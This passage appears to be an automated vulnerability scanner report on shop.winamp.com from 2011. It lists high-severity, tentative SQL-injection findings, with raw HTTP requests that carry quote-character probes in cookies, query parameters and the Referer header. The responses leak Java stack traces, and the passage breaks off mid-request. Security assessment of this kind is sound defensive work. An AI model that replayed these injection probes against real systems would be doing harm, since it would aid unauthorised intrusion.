Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409894031,0)
Date: Sun, 27 Feb 2011 17:47:24 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409894267,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:25 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.16. http://shop.winamp.com/store [JSESSIONID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF'; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409868347,0)
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 24204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>javax.servlet.ServletException: Required Page Parameter: productID not provided
   at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283)
   at com.digitalriver.system.controller.Siteflo
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF''; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409869490,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.17. http://shop.winamp.com/store [Locale parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Locale request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101639964458,0)
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=101639965117,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:22 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.18. http://shop.winamp.com/store [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704891155,0)
Date: Sun, 27 Feb 2011 17:47:54 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 32916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: REQ_000002
   at com.digitalriver.catalog.rules.AddItemToRequisition.doWork(AddItemToRequisition.java:287)
   at com.digitalriver.rules.ActionRule.evaluate(ActionRule.java:41)
   at
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=110230053450,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.19. http://shop.winamp.com/store [ThemeID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300'&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=105934960573,0)
Date: Sun, 27 Feb 2011 17:45:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 23801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ThemeID=1279300%27&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000001
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300''&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300%27%27&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=105934961726,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:45:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.20. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1'=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704877618,0)
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 41391


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
:include src="/store?1'=1&Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"-->
...[SNIP]...
<pre>com.digitalriver.exception.TrackedSystemException: SIT_000002
   at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:516)
   at com.digitalriver.system.controller.SiteflowPlugin.handleRequest(
...[SNIP]...
.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:690)
   at java.lang.Thread.run(Thread.java:619)
Caused by: com.digitalriver.rules.EvaluationException: java.lang.NullPointerException
Failed expression:product.getAllVariations()
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:190)
   at com.digitalriver.rules.MethodInvocation.evaluate(MethodInvocation.java:165)

...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&1''=1 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?1''=1&Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500
Content-Type: text/plain
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=131704878770,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:47:41 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59


1.21. http://shop.winamp.com/store [productID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the productID request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=67280272038,0)
Date: Sun, 27 Feb 2011 17:46:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 25208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
-!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500%2527"-->
...[SNIP]...
<pre>java.lang.NullPointerException
   at com.digitalriver.security.SecurityModuleImpl.isPageAllowed(SecurityModuleImpl.java:762)
   at sun.reflect.GeneratedMethodAccessor290.invoke(Unknown Source)
   at sun.reflect.DelegatingMethodAccessorIm
...[SNIP]...

Request 2

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500%2527%2527 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
